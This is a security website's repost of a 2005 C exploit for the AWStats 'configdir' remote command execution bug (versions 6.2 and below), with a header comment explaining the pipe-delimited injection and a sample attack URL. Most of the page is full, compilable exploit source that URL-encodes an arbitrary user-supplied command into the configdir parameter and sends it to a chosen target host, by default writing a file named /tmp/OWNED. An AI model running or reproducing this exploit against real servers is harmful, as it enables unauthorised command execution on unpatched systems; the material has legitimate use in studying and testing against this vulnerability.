首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
AWStats configdir Remote Command Execution Exploit
来源:http://www.idefense.com/ 作者:iDEFENSE 发布时间:2005-01-26  

AWStats "configdir" Remote Command Execution Exploit

Related Advisory - KOTIK/ADV-2005-0032

/*
AwStats exploit by Thunder, molnar_rcs@yahoo.com

This exploit makes use of the remote command execution bug discovered in
AwStats ver 6.2 and below. The bug resides in the awstats.pl perl script.
The script does not sanitise correctly the user input for the
`configdir` parameter. If the users sends a command prefixed and postfixed
with | , the command will be executed. An example would be:

Let's execute '/usr/bin/w':
>
http://localhost/cgi-bin/awstats.pl?configdir=%20|%20/usr/bin/w%20|%20
<

Awstat output:
>
Error: LogFile parameter is not defined in config/domain file
Setup (' | /usr/bin/w | /awstats.localhost.conf' file, web server or permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
<

That's it. Our command was executed.
This bug is fixed in AwStats ver 6.3 and a patch was released for all versions, but vulnerable
AwStat is still available for download on several sites (ex. www.topshareware.com).

Type `gcc awexpl.c - o awexpl` to compile the exploit and `./awexpl -u` for usage.

Note:
Just indexing the commands with | will not always work, or might not work at all. I checked
it on my own awstats 6.0 install, and it failed. So, whoever tried the same on his own
script and was surprised to see that (although the version he uses is said to be prone to the
remote command execution bug) nothing happened, should patch or upgrade to Awstat 6.3 asap.
As far as i know all unpached versions prior to 6.3 are vulnerable and commands prefixed and
postfixed by a | character WILL be executed. Beware!

Oh, I almost forgot, the disclaimer :)

THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
AND WITHOUT ANY WARRANTY.

Robert Molnar,
21th jan 2005
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
//#include <unistd.h>
#include <arpa/inet.h>
#include <string.h>

void usage(char *pname)
{
printf("# AWStats exploit by Thunder, molnar_rcs@yahoo.com\n"
"# Usage: %s -h <host> -i <ip> [-s Script] [-p Path] [-o Port] [-c Commands] [-u]\n"
"\t-h : target host name, default is `localhost`\n"
"\t-i : target IP (to wich host name resolvs)\n"
"\t-s : script name, default is `awstats.pl`\n"
"\t-p : script path, default is `/cgi-bin`\n"
"\t-o : specify port to connect to, default is `80`\n"
"\t-c : specify commands to be executed, the exploit will create a\n"
"\t : file named `OWNED` in `/tmp` by default\n"
"\t-u : usage\n\n"
"# Example: %s -h localhost -i 127.0.0.1\n"
"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin\n"
"# : %s -h localhost -i 127.0.0.1 -p /~user/cgi-bin -c \"/usr/bin/id\"\n"
, pname, pname, pname, pname);

exit(0);
}

char * urlEncode(char *inC)
{
int c, i, j = 0;
char *h = "0123456789abcdef";
char retval[1024], res[3072];
memcpy(retval, inC, strlen(inC));
retval[strlen(inC)] = '\0';
for(i=0; i < strlen(inC); i++){
c = retval[i];
if( 'a' <= c && c <= 'z'
|| 'A' <= c && c <= 'Z'
|| '0' <= c && c <= '9'
|| c == '-' || c == '_' || c == '.')
res[j++] = c;
else {
res[j++] = '%';
res[j++] = h[c >> 4];
res[j++] = h[c & 0x0f];
}
}
return res;

}


char *buildHeader(char *Xhost, char *Xpath,char *Xscript, char *exeCmd)
{
char Header[5196];

sprintf( Header,
"GET %s/%s?configdir=%s HTTP/1.1\r\n"
"Accept: text/xml,application/xml,application/xhtml+xml,"
"text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,"
"image/jpeg,image/gif;q=0.2,text/css,*/*;q=0.1\r\n"
"Accept-Language: en-us\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)\r\n"
"Host: %s\r\n"
"Connection: Keep-Alive\r\n"
"Cache-Control: no-cache\r\n"
"\r\n"
, Xpath, Xscript, urlEncode(exeCmd), Xhost );
return Header;
}


void exploit(char *Xhost, char *Xpath,char *Xscript, char *exeCmd, char *Xip, int Xport)
{
int sock, disp = 0, count = 0;
struct sockaddr_in sockaddrX;
char *oData, iData;

printf("# AWStats Exploit by Thunder, molnar_rcs@yahoo.com\n");
sockaddrX.sin_port = htons(Xport);
sockaddrX.sin_family = AF_INET;
sockaddrX.sin_addr.s_addr = inet_addr(Xip);
if(Xhost == "localhost")
{
printf("# Using hardcoded (default) options, use `-u` for usage\n"
);
}
printf("# Connecting to %s (%s) ...", Xhost, Xip);
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
if (connect(sock, (struct sockaddr*)&sockaddrX, 16) < 0)
{
printf("\n# Connect to %s (%s) on port %i failed!\n", Xhost, Xip, Xport);
exit(-1);
}
printf("Done!\n# Building header...");
oData = buildHeader(Xhost, Xpath, Xscript, exeCmd);
printf("Done!\n# Sending data...");
send(sock, oData, strlen(oData), 0);

/* the code below reads the server response byte by byte, this is not needed
while(read(sock, &iData, 1))
putchar(iData);
*/
printf("Done!\n# Exploit finished.\n");
close(sock);
}

int main(int argc, char * argv[])
{
extern char *optarg;
extern int optind, optopt;

int c,
Xport = 80,
isgood = 0;

char *Xhost = "localhost" ,
*Xip = "127.0.0.1",
*Xscript = "awstats.pl",
*Xpath = "/cgi-bin";

char exeCmd[1024] = "| echo \"You have been Owned, update AWstat or patch\" > /tmp/OWNED | ";

while ((c = getopt(argc, argv, ":uh:i:s:p:c:o:")) != -1)
{

switch(c)
{
case 'h':
Xhost = optarg;
isgood++;
break;

case 'i':
Xip = optarg;
isgood++;
break;

case 's':
Xscript = optarg;
break;

case 'p':
Xpath = optarg;
break;

case 'c':
if(strlen(optarg) > 1018)
{
printf("# `-c` argument can't exceed 1024 bytes (command to long)");
exit(0);
}
sprintf(exeCmd, " | %s | ", optarg);
break;

case 'o':
Xport = atoi(optarg);
break;

case 'u':
usage(argv[0]);
break;

case '?':
printf("# Unknown option `-%c`\n", optopt);
break;


}
}


if( isgood == 1)
{
printf("# Please specify both host `-h` and ip `-i`\n");
exit(0);
}

exploit(Xhost, Xpath, Xscript, exeCmd, Xip, Xport);
return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AWStats configdir Remote Comma
·Berlios gpsd Remote Format Str
·Search and Replace Compressed
·/usr/bin/trn Local Root Exploi
·最新Help ActiveX控件网页木马
·Siteman <= 1.1.10 Remote Ad
·Mac OS X 10.3 iSync 'mRouter'
·Golden FTP Server v2.02b Remot
·Microsoft Internet Explorer .A
·Gpsd remote format string expl
·MacOSX <= 10.3.7 Input Vali
·HKLM CurrentVersion Locking
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved